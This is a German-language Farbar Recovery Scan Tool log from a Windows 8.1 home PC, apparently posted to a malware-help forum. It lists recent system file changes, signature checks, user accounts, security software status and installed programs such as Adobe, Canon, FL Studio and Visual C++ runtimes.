2017-05-18 22:17 - 2017-05-18 22:17 - 00166288 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudmdm.sys
2017-05-18 22:17 - 2017-05-18 22:17 - 00131984 _____ (Samsung Electronics Co., Ltd.) C:\Windows\system32\Drivers\ssudbus.sys
2017-05-11 14:18 - 2017-04-28 23:15 - 07444824 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-05-11 14:18 - 2017-04-26 16:06 - 04169216 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-05-11 14:18 - 2017-04-16 12:23 - 02176584 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2017-05-11 14:18 - 2017-04-16 12:23 - 01662096 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2017-05-11 14:18 - 2017-04-16 12:23 - 01063464 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2017-05-11 14:18 - 2017-04-16 12:18 - 01135288 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-05-11 14:18 - 2017-04-16 12:18 - 00803192 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 01566032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 01213792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2017-05-11 14:18 - 2017-04-16 11:07 - 00548032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2017-05-11 14:18 - 2017-04-16 11:05 - 00612096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2017-05-11 14:18 - 2017-04-16 10:54 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2017-05-11 14:18 - 2017-04-16 10:54 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2017-05-11 14:18 - 2017-04-16 10:51 - 02899456 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2017-05-11 14:18 - 2017-04-16 10:37 - 00116224 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2017-05-11 14:18 - 2017-04-16 10:36 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2017-05-11 14:18 - 2017-04-16 10:35 - 25741312 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2017-05-11 14:18 - 2017-04-16 10:18 - 05977600 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2017-05-11 14:18 - 2017-04-16 10:16 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-05-11 14:18 - 2017-04-16 10:10 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2017-05-11 14:18 - 2017-04-16 10:03 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2017-05-11 14:18 - 2017-04-16 10:02 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2017-05-11 14:18 - 2017-04-16 10:01 - 00499200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2017-05-11 14:18 - 2017-04-16 10:00 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2017-05-11 14:18 - 2017-04-16 10:00 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2017-05-11 14:18 - 2017-04-16 09:53 - 02290176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2017-05-11 14:18 - 2017-04-16 09:52 - 01033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-05-11 14:18 - 2017-04-16 09:49 - 20278272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2017-05-11 14:18 - 2017-04-16 09:47 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2017-05-11 14:18 - 2017-04-16 09:43 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2017-05-11 14:18 - 2017-04-16 09:40 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2017-05-11 14:18 - 2017-04-16 09:40 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2017-05-11 14:18 - 2017-04-16 09:40 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2017-05-11 14:18 - 2017-04-16 09:37 - 02132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2017-05-11 14:18 - 2017-04-16 09:29 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2017-05-11 14:18 - 2017-04-16 09:24 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2017-05-11 14:18 - 2017-04-16 09:23 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2017-05-11 14:18 - 2017-04-16 09:22 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2017-05-11 14:18 - 2017-04-16 09:22 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2017-05-11 14:18 - 2017-04-16 09:17 - 00880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-05-11 14:18 - 2017-04-16 09:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 15250944 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2017-05-11 14:18 - 2017-04-16 09:10 - 00330752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2017-05-11 14:18 - 2017-04-16 09:08 - 04548608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2017-05-11 14:18 - 2017-04-16 09:08 - 02057216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2017-05-11 14:18 - 2017-04-16 09:04 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2017-05-11 14:18 - 2017-04-16 09:02 - 00267776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2017-05-11 14:18 - 2017-04-16 08:53 - 13661184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2017-05-11 14:18 - 2017-04-16 08:50 - 01544704 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2017-05-11 14:18 - 2017-04-16 08:40 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2017-05-11 14:18 - 2017-04-16 08:37 - 02767872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2017-05-11 14:18 - 2017-04-16 08:34 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2017-05-11 14:18 - 2017-04-16 08:34 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2017-05-11 14:18 - 2017-04-10 00:00 - 01548640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-05-11 14:18 - 2017-04-10 00:00 - 00388448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-05-11 14:18 - 2017-04-08 01:20 - 01375960 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-05-11 14:18 - 2017-04-07 15:56 - 01094656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-05-11 14:18 - 2017-04-02 18:41 - 00684544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-05-11 14:18 - 2017-04-02 18:41 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-05-11 14:18 - 2017-04-01 01:16 - 01968408 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2017-05-11 14:18 - 2017-03-31 23:59 - 01612504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2017-05-10 16:11 - 2017-05-10 16:11 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\My Games
2017-05-07 15:12 - 2017-05-25 16:04 - 00000000 ____D C:\ProgramData\Orbit
2017-05-07 15:12 - 2017-05-07 15:12 - 00281688 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2017-05-07 15:12 - 2017-05-07 15:12 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\PunkBuster
2017-05-07 15:06 - 2017-05-25 16:04 - 00000000 ____D C:\Users\Nick Schuster\Documents\My Games
2017-05-07 14:58 - 2017-05-11 23:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Ubisoft Game Launcher
2017-05-07 14:51 - 2017-06-05 15:36 - 00000000 ____D C:\Windows\System32\Tasks\Games
2017-05-07 14:41 - 2017-05-07 14:41 - 00282512 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2017-05-07 14:41 - 2017-05-07 14:41 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 14:38 - 2017-05-07 14:38 - 00394296 _____ (Duplex Secure Ltd.) C:\Windows\system32\Drivers\sptd.sys
2017-05-07 14:03 - 2017-05-07 14:03 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Disc_Soft_Ltd
2017-05-07 13:50 - 2017-05-07 13:50 - 00000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2017-05-07 13:14 - 2017-05-07 13:53 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\DAEMON Tools Lite
2017-05-07 13:14 - 2017-05-07 13:14 - 00047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2017-05-07 13:14 - 2017-05-07 13:14 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2017-05-07 13:13 - 2017-05-07 13:13 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite

==================== Ein Monat: Ge鋘derte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-06-05 16:59 - 2016-07-31 16:09 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\CrashDumps
2017-06-05 16:59 - 2015-12-26 17:46 - 00000000 __RDO C:\Users\Nick Schuster\OneDrive
2017-06-05 16:58 - 2015-12-26 22:26 - 00000180 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-06-05 16:58 - 2015-12-26 17:53 - 00000000 __SHD C:\Users\Nick Schuster\IntelGraphicsProfiles
2017-06-05 16:58 - 2013-08-22 16:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-06-05 15:59 - 2015-12-26 16:48 - 00003596 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3847841184-804715454-2304624315-1001
2017-06-05 15:57 - 2016-07-31 18:48 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-06-05 15:50 - 2017-04-17 12:52 - 00000000 ____D C:\Windows\Update
2017-06-05 15:50 - 2017-03-28 19:39 - 00000000 ____D C:\Windows\system32\log
2017-06-05 15:44 - 2017-02-20 22:17 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Mozilla
2017-06-05 15:42 - 2016-09-14 15:11 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Adobe
2017-06-05 15:41 - 2016-07-31 14:30 - 00000008 __RSH C:\Users\Nick Schuster\ntuser.pol
2017-06-05 15:41 - 2015-12-26 16:37 - 00000000 ____D C:\Users\Nick Schuster
2017-06-05 15:36 - 2016-11-18 14:18 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ
2017-06-05 15:36 - 2016-01-21 14:13 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Temp
2017-06-05 14:38 - 2016-01-11 18:42 - 07433728 ___SH C:\Users\Nick Schuster\Desktop\Thumbs.db
2017-06-05 12:04 - 2014-11-21 05:35 - 01776918 _____ C:\Windows\system32\PerfStringBackup.INI
2017-06-05 12:04 - 2014-11-21 04:45 - 00765582 _____ C:\Windows\system32\perfh007.dat
2017-06-05 12:04 - 2014-11-21 04:45 - 00159366 _____ C:\Windows\system32\perfc007.dat
2017-06-05 12:04 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2017-06-04 10:17 - 2016-09-17 17:52 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\vlc
2017-06-02 16:14 - 2016-06-01 16:03 - 01862144 ___SH C:\Users\Nick Schuster\Downloads\Thumbs.db
2017-06-01 23:52 - 2013-08-22 15:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2017-06-01 19:26 - 2015-12-29 20:54 - 00000000 ____D C:\Windows\pss
2017-06-01 12:01 - 2016-07-05 17:55 - 00000000 ____D C:\Users\Nick Schuster\AppData\LocalLow\Adblock Plus for IE
2017-05-31 17:34 - 2017-02-12 14:31 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Bluestacks
2017-05-31 17:34 - 2013-08-22 17:36 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-31 17:31 - 2016-06-14 20:57 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Sony
2017-05-31 16:11 - 2017-03-16 13:19 - 00001312 _____ C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2017-05-31 13:52 - 2016-09-17 17:56 - 00000000 ____D C:\ProgramData\Apple
2017-05-31 10:46 - 2017-03-17 14:02 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-30 19:32 - 2016-10-08 16:17 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Deployment
2017-05-30 14:12 - 2016-12-27 21:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-05-30 14:11 - 2015-12-27 21:26 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Google
2017-05-30 14:05 - 2017-02-03 12:28 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Samsung
2017-05-30 14:05 - 2017-02-03 12:27 - 00000000 ____D C:\Program Files (x86)\Samsung
2017-05-30 14:05 - 2016-10-23 18:05 - 00000000 ____D C:\ProgramData\Samsung
2017-05-29 23:08 - 2017-02-13 16:13 - 00000000 ____D C:\Program Files (x86)\Minecraft
2017-05-29 23:08 - 2016-12-10 12:29 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\.minecraft
2017-05-29 21:59 - 2016-10-12 16:07 - 00000000 ____D C:\Program Files\Image-Line
2017-05-26 18:19 - 2016-11-18 17:58 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-26 10:55 - 2016-01-04 18:15 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-25 15:49 - 2017-02-14 16:53 - 00000000 ____D C:\ProgramData\SUPPORTDIR
2017-05-25 15:49 - 2017-02-14 16:53 - 00000000 ____D C:\ProgramData\install_backup
2017-05-25 15:49 - 2017-02-03 12:27 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-25 15:49 - 2016-10-13 22:01 - 00000000 ____D C:\ProgramData\TEMP
2017-05-24 11:40 - 2017-02-27 11:37 - 00000000 ____D C:\ProgramData\CanonIJPLM
2017-05-23 15:40 - 2013-08-22 17:20 - 00000000 ____D C:\Windows\CbsTemp
2017-05-23 15:34 - 2015-12-28 20:55 - 132223576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-05-23 15:34 - 2015-12-28 20:55 - 00000000 ____D C:\Windows\system32\MRT
2017-05-22 21:46 - 2015-12-27 00:10 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\Skype
2017-05-22 21:24 - 2016-09-24 19:16 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-22 21:24 - 2015-12-27 00:10 - 00002715 _____ C:\Users\Public\Desktop\Skype.lnk
2017-05-22 21:24 - 2015-12-27 00:10 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-05-22 21:24 - 2015-12-27 00:10 - 00000000 ____D C:\ProgramData\Skype
2017-05-21 19:04 - 2015-12-26 22:50 - 00000000 ____D C:\Program Files (x86)\TeamViewer
2017-05-21 19:03 - 2017-02-26 13:05 - 00000991 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 12.lnk
2017-05-21 19:03 - 2017-02-26 13:05 - 00000979 _____ C:\Users\Public\Desktop\TeamViewer 12.lnk
2017-05-17 18:44 - 2016-08-20 12:01 - 00000000 ____D C:\Users\Nick Schuster\AppData\Roaming\TeamViewer
2017-05-17 16:58 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-05-17 16:41 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\FxsTmp
2017-05-16 15:15 - 2017-03-07 15:40 - 00000000 ____D C:\Users\Nick Schuster\.gimp-2.8
2017-05-14 22:50 - 2017-03-16 23:29 - 00000000 ____D C:\Users\Nick Schuster\Desktop\fl studio songs
2017-05-14 16:21 - 2016-07-31 16:03 - 05282048 _____ C:\Windows\system32\FNTCACHE.DAT
2017-05-14 16:16 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-05-13 00:45 - 2017-02-12 16:33 - 00000000 ____D C:\Users\Nick Schuster\Desktop\BSHelper
2017-05-09 18:25 - 2016-11-08 22:46 - 00004496 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2017-05-09 18:25 - 2016-10-13 18:22 - 00004342 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-05-09 17:25 - 2013-08-22 17:36 - 00000000 ____D C:\Windows\system32\Macromed
2017-05-07 13:16 - 2016-12-17 15:58 - 00000000 ____D C:\Users\Nick Schuster\AppData\Local\Chromium

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-12-12 23:28 - 2016-12-12 23:28 - 0001120 _____ () C:\Users\Nick Schuster\AppData\Roaming\.minecraft - Verkn黳fung.lnk
2010-08-28 22:43 - 2010-08-28 22:43 - 0096256 ____N (Google, inc) C:\Users\Nick Schuster\AppData\Roaming\AdbWinApi.dll
2010-08-28 22:43 - 2010-08-28 22:43 - 0060928 ____N (Google, inc) C:\Users\Nick Schuster\AppData\Roaming\AdbWinUsbApi.dll
2017-03-07 15:59 - 2017-03-07 15:59 - 0003330 _____ () C:\Users\Nick Schuster\AppData\Local\recently-used.xbel
2016-01-07 17:00 - 2016-12-17 21:05 - 0007598 _____ () C:\Users\Nick Schuster\AppData\Local\Resmon.ResmonCfg
2017-02-12 14:36 - 2017-04-22 20:22 - 0000552 _____ () C:\Users\Nick Schuster\AppData\Local\TroubleshooterConfig.json
2016-10-21 22:16 - 2016-10-23 18:04 - 0000158 _____ () C:\Users\Nick Schuster\AppData\Local\uts.ini

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix f黵 Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-23 15:34

==================== Ende von FRST.txt ============================
         
--- --- ---

[/CODE]

Code:
ATTFilter
Zus鋞zliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-06-2017
durchgef黨rt von Nick Schuster (05-06-2017 17:03:17)
Gestartet von C:\Users\Nick Schuster\Desktop\killer.exe
Windows 8.1 (Update) (X64) (2015-12-26 14:37:47)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3847841184-804715454-2304624315-500 - Administrator - Disabled)
Gast (S-1-5-21-3847841184-804715454-2304624315-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3847841184-804715454-2304624315-1003 - Limited - Enabled)
Nick Schuster (S-1-5-21-3847841184-804715454-2304624315-1001 - Administrator - Enabled) => C:\Users\Nick Schuster

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" k鰊nen in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe After Effects CC 2015 (HKLM-x32\...\{147EC100-14BE-45EF-AB42-35BAEE7D02F0}) (Version: 13.6.1 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Photoshop CS6 Version 13.0.1 (HKLM-x32\...\{A724DC44-6241-42D3-BA57-778B178ABC17}_is1) (Version: 13.0.1 - Adobe Systems, Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.7.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.4.4 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.7.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.20.13 - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 5.2.0 - Canon Inc.)
Canon MG5700 series Benutzerregistrierung (HKLM-x32\...\Canon MG5700 series Benutzerregistrierung) (Version:  - *Canon Inc.)
Canon MG5700 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5700_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.3.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.7.1 - Canon Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.1.2 - )
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio 12.1.2 (HKLM\...\FL Studio 12.1.2_is1) (Version:  - )
FL Studio ASIO (HKLM\...\FL Studio ASIO) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Fotogalerie (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
FreeOCR v5.4 (HKLM-x32\...\freeocr_is1) (Version:  - )
GIMP 2.8.20 (HKLM\...\GIMP-2_is1) (Version: 2.8.20 - The GIMP Team)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
HandBrake 0.10.5 (HKLM-x32\...\HandBrake) (Version: 0.10.5 - )
Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Java 8 Update 121 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Malwarebytes Version 3.1.2.1733 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes)
MegaDownloader 1.7 (HKLM\...\{C12C2297-65A4-4E64-9AE1-29F0D947FDA0}}_is1) (Version: 1.7 - AppsForMega.info)
Microsoft OneDrive (HKU\S-1-5-21-3847841184-804715454-2304624315-1001\...\OneDriveSetup.exe) (Version: 17.3.6799.0327 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50906.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022.218 (HKLM-x32\...\{E503B4BF-F7BB-3D5F-8BC8-F694B1CFF942}) (Version: 9.0.21022.218 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
